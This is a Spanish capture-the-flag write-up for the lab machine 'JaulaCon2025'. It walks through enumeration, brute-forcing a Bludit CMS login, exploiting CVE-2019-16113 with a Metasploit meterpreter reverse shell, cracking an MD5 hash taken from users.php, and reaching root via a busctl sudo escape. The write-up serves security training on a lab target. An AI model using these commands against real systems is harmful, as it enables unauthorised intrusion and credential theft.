JaulaCon2025


Enumeration
Vamos a empezar con un escaneo nmap
:
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/nmap]
└─$ nmap -p- --open -sS -n -Pn -vvv --min-rate=5000 192.168.44.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-19 16:19 CEST
Initiating ARP Ping Scan at 16:19
Scanning 192.168.44.131 [1 port]
Completed ARP Ping Scan at 16:19, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 16:19
Scanning 192.168.44.131 [65535 ports]
Discovered open port 80/tcp on 192.168.44.131
Discovered open port 22/tcp on 192.168.44.131
Completed SYN Stealth Scan at 16:19, 0.74s elapsed (65535 total ports)
Nmap scan report for 192.168.44.131
Host is up, received arp-response (0.00044s latency).
Scanned at 2025-07-19 16:19:10 CEST for 1s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:0F:FD:9F (VMware)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Vamos a realizar un segundo escaneo para determinar el servicio y versión que corre en cada puerto:
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/nmap]
└─$ nmap -p22,80 -sCV 192.168.44.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-19 16:19 CEST
Nmap scan report for jaulacon2025.thl (192.168.44.131)
Host is up (0.00014s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 af:79:a1:39:80:45:fb:b7:cb:86:fd:8b:62:69:4a:64 (ECDSA)
|_ 256 6d:d4:9d:ac:0b:f0:a1:88:66:b4:ff:f6:42:bb:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Bienvenido a Bludit | BLUDIT
|_http-generator: Bludit
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 00:0C:29:0F:FD:9F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
Bien, vamos a ver la aplicación web:

Vemos que no carga correctamente… seguramente porque haya un dominio configurado. Viendo el código fuente web me encuentro lo siguiente:

Vamos a añadir jaulacon2025.thl
en nuestro /etc/hosts
:
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.44.131 jaulacon2025.thl
Ahora si recargamos la web la veremos normal:

Bien, si nos fijamos podemos ver varias veces el nombre Bludit. Si buscamos lo que es nos encontraremos lo siguiente:

Vemos que es un CMS, vamos a realizar fuzzing con ffuf
para ver si encontramos la versión especifica del CMS:
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/nmap]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://jaulacon2025.thl/FUZZ" -e .php,.html,.txt,.js
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://jaulacon2025.thl/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .js
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
0 [Status: 200, Size: 4541, Words: 271, Lines: 137, Duration: 200ms]
admin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 150ms]
install.php [Status: 200, Size: 30, Words: 5, Lines: 1, Duration: 6ms]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2, Duration: 55ms]
LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22, Duration: 0ms]
Vamos a ver install.php
:

No vemos ninguna información relevante, vamos a ver en robots.txt
:

Nada… Decidí leer la propia documentación de Bludit:

Vamos a acceder a ver que hay y si podemos sacar la versión del CMS:

Vemos la carpeta version
vamos a entrar:

Accediendo a metadata.json
encontramos lo siguiente:
{
"author": "Bludit",
"email": "",
"website": "https://plugins.bludit.com",
"version": "3.9.2",
"releaseDate": "2019-06-21",
"license": "MIT",
"compatible": "3.9.2",
"notes": ""
}
Encontramos la versión 3.9,2
, vamos a buscar la última versión que hay:

Vemos que esta desactualizado el CMS, vamos a buscar algún posible exploit. Buscando encontré el siguiente CVE:
Pero requerimos de credenciales… Buscando encontré lo siguiente:
Shell as www-data
Vamos a usarlo para hacer fuerza bruta:
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ python3 Bludit-Auth-Bypass.py -l http://jaulacon2025.thl/admin/ -u /usr/share/wordlists/rockyou.txt -p /usr/share/wordlists/rockyou.txt
Nota
Al ejecutar por primera vez el Bludit-Auth-Bypass.py
os pedirá instalar unos requerimientos, os recomiendo hacerlo en un entorno virtual (venv).
Después de un rato no encontró nada… Recordando en la web estaba el siguiente texto sin más:

Vamos a probar a añadir este usuario en una wordlist y probar nuevamente el script de fuerza bruta:
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ python3 Bludit-Auth-Bypass.py -l http://jaulacon2025.thl/admin/ -u users -p /usr/share/wordlists/rockyou.txt
[..]
[*] ¡ÉXITO!
[+] Usar credencial -> Jaulacon2025:cassandra
Encontró las credenciales correctas!! Vamos a probarlas en el login:

Bien!! Ahora podremos explotar el CVE-2019-16113 encontrado anteriormente, para ello lo explotaremos con metasploit. Vamos a iniciarlo y seleccionar el exploit:
┌──(venv)─(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ msfconsole
Metasploit tip: Save the current environment with the save command,
future console restarts will use this environment again
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.4.69-dev ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 432 post ]
+ -- --=[ 1672 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search bludit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/bludit_upload_images_exec
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(linux/http/bludit_upload_images_exec) >
Ahora pondremos show options
para ver las opciones que solicita para explotar el exploit:
msf6 exploit(linux/http/bludit_upload_images_exec) > show options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS yes The password for Bludit
BLUDITUSER yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.44.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
View the full module info with the info, or info -d command.
Vamos a ir poniendo los datos respectos solicitados:
msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS cassandra
BLUDITPASS => cassandra
msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER Jaulacon2025
BLUDITUSER => Jaulacon2025
msf6 exploit(linux/http/bludit_upload_images_exec) > set RHOST jaulacon2025.thl
RHOST => jaulacon2025.thl
Ahora pondremos run
y veremos si funciona:
msf6 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 192.168.44.128:4444
[+] Logged in as: Jaulacon2025
[*] Retrieving UUID...
[*] Uploading AigqPgXPSs.png...
[*] Uploading .htaccess...
[*] Executing AigqPgXPSs.png...
[*] Sending stage (40004 bytes) to 192.168.44.131
[+] Deleted .htaccess
[*] Meterpreter session 1 opened (192.168.44.128:4444 -> 192.168.44.131:40574) at 2025-07-19 17:37:38 +0200
Ahora pondremos shell
para tener ya acceso a la máquina:
meterpreter > shell
Process 3135 created.
Channel 0 created.
whoami
www-data
Shell as JaulaCon2025
Leyendo la documentación de Bludit encontré lo siguiente:
En las primeras lineas comenta lo siguiente:
/bl-content/ <-- Databases and uploaded images
Vemos que en esa carpeta contiene el tema de las bases de datos, vamos a verla:
www-data@JaulaCon2025:/var/www/html/bl-content/databases$ ls
ls
categories.php plugins site.php tags.php
pages.php security.php syslog.php users.php
www-data@JaulaCon2025:/var/www/html/bl-content/databases$
Vemos un users.php
vamos a leerlo:
[..]
"JaulaCon2025": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "551211bcd6ef18e32742a73fcb85430b",
"salt": "jejej",
"email": "",
"registered": "2025-03-25 19:43:25",
"tokenRemember": "",
"tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}
Tenemos en MD5
la contraseña del usuario JaulaCon2025
. Para confirmar vamos a leer el /etc/passwd
para ver si existe en el sistema:
www-data@JaulaCon2025:/var/www/html/bl-content/databases$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
JaulaCon2025:x:1001:1001::/home/JaulaCon2025:/bin/bash
Existe, vamos a usar CrackStation para intentar crackear la contraseña:

Bien!! Vamos a probar a iniciar por SSH:
┌──(pylon㉿kali)-[~/…/pylon/THL/JaulaCon2025/exploits]
└─$ ssh JaulaCon2025@192.168.44.131
JaulaCon2025@192.168.44.131's password:
Linux JaulaCon2025 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 19 18:13:44 2025 from 192.168.44.128
JaulaCon2025@JaulaCon2025:~$
Shell as root
Vamos a ver si tenemos algún permiso SUDOERS en la máquina, para ello haremos un sudo -l
:
JaulaCon2025@JaulaCon2025:~$ sudo -l
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User JaulaCon2025 may run the following commands on JaulaCon2025:
(root) NOPASSWD: /usr/bin/busctl
Si buscamos este binario en GTFObins nos comenta lo siguiente para abusar de el:
sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/bash,argv1=-c,argv2='/bin/bash -i 0<&2 1>&2'
Vamos a explotarlo:
JaulaCon2025@JaulaCon2025:~$ sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/bash,argv1=-c,argv2='/bin/bash -i 0<&2 1>&2'
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
root@JaulaCon2025:/home/JaulaCon2025# whoami
root
root! ;)